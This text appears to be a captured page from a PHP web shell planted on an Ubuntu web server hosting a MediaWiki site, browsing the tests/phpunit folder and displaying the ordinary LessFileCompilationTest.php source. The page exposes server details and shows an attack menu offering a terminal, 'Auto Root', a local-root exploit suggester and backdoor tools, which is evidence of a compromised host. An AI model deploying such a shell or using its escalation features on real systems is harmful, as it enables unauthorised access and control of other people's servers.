Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
tests /
phpunit /
Delete
Unzip
Name
Size
Permission
Date
Action
data
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
docs
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
includes
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
languages
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
maintenance
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
mocks
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
skins
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
specials
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
structure
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
suites
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
tests
[ DIR ]
drwxr-xr-x
2016-11-28 20:20
LessFileCompilationTest.php
1.37
KB
-rw-r--r--
2016-11-28 20:20
Makefile
2.04
KB
-rw-r--r--
2016-11-28 20:20
MediaWikiLangTestCase.php
633
B
-rw-r--r--
2016-11-28 20:20
MediaWikiPHPUnitCommand.php
1007
B
-rw-r--r--
2011-06-02 21:32
MediaWikiPHPUnitTestListener.php
3.14
KB
-rw-r--r--
2016-11-28 20:20
MediaWikiTestCase.php
50.94
KB
-rw-r--r--
2016-11-28 20:20
README
1.21
KB
-rw-r--r--
2016-11-28 20:20
ResourceLoaderTestCase.php
3.67
KB
-rw-r--r--
2016-11-28 20:20
TODO
986
B
-rw-r--r--
2016-11-28 20:20
bootstrap.php
748
B
-rw-r--r--
2016-11-28 20:20
install-phpunit.sh
807
B
-rwxr-xr-x
2011-06-04 23:34
phpunit.php
4.78
KB
-rwxr-xr-x
2016-11-28 20:20
run-tests.bat
45
B
-rw-r--r--
2016-11-28 20:20
suite.xml
2.21
KB
-rw-r--r--
2016-11-28 20:20
Save
Rename
<?php /** * Modelled on Sebastian Bergmann's PHPUnit_Extensions_PhptTestCase class. * * @see https://github.com/sebastianbergmann/phpunit/blob/master/src/Extensions/PhptTestCase.php * @author Sam Smith <samsmith@wikimedia.org> */ class LessFileCompilationTest extends ResourceLoaderTestCase { /** * @var string $file */ protected $file; /** * @var ResourceLoaderModule The ResourceLoader module that contains * the file */ protected $module; /** * @param string $file * @param ResourceLoaderModule $module The ResourceLoader module that * contains the file */ public function __construct( $file, ResourceLoaderModule $module ) { parent::__construct( 'testLessFileCompilation' ); $this->file = $file; $this->module = $module; } public function testLessFileCompilation() { $thisString = $this->toString(); $this->assertTrue( is_string( $this->file ) && is_file( $this->file ) && is_readable( $this->file ), "$thisString must refer to a readable file" ); $rlContext = $this->getResourceLoaderContext(); // Bleh $method = new ReflectionMethod( $this->module, 'compileLessFile' ); $method->setAccessible( true ); $this->assertNotNull( $method->invoke( $this->module, $this->file, $rlContext ) ); } public function toString() { $moduleName = $this->module->getName(); return "{$this->file} in the \"{$moduleName}\" module"; } }